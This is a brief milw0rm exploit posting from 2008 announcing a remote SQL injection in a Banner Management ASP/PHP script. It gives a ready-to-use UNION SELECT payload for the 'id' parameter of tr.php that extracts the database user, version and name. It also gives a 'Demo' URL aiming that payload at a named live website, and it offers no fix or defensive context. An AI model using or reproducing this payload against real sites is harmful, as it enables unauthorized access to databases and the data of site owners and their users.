Banner Management (id) Remote SQL Injection Vulnerability ___________________________________ Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc ___________________________________ script : http://www.yourfreeworld.com/script/bannermanagementscript.asp DorK : :) Exploit : _______ tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13-- Demo : _______ http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13-- Greetz : All my freind # milw0rm.com [2008-11-01]